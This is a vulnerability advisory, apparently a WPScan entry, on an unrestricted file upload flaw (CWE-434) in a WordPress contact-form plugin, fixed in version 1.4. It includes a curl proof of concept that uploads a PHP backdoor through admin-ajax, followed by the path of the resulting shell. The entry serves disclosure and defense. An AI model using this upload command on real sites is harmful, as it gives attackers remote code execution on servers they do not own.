N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload
Sign up to our free email alerts service for instant vulnerability notifications!| Description | The "upload_file()" ajax function is affected from unrestricted file upload vulnerability. |
| Proof of Concept | curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://www.example.com/wp-admin/admin-ajax.php
Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
http://www.example.com/wp-content/uploads/contact_files/1427927588-backdoor.php
|
Affects
| Plugin |
website-contact-form-with-file-upload
fixed in version 1.4
|
References
| EXPLOITDB | 36738 |
| METASPLOIT | exploit/unix/webapp/wp_nmediawebsite_file_upload |
| PACKETSTORM | 131413 |
| PACKETSTORM | 131514 |
| URL | http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/ |
Classification
| Type | UPLOAD |
| CWE | CWE-434 |
Miscellaneous
| Submitter | Claudio Viviani |
| Submitter Website | http://www.homelab.it |
| Submitter Twitter | homelabit |
| Views | 434 |
| Verified | Yes |
| WPVDB ID | 7896 |
Timeline
| Publicly Published | 2015-04-12 (over 2 years ago) |
| Added | 2015-04-13 (over 2 years ago) |
| Last Updated | 2015-05-15 (over 2 years ago) |
Copyright & License
| Copyright | All data and resources contained within this page and this web site is Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us. |
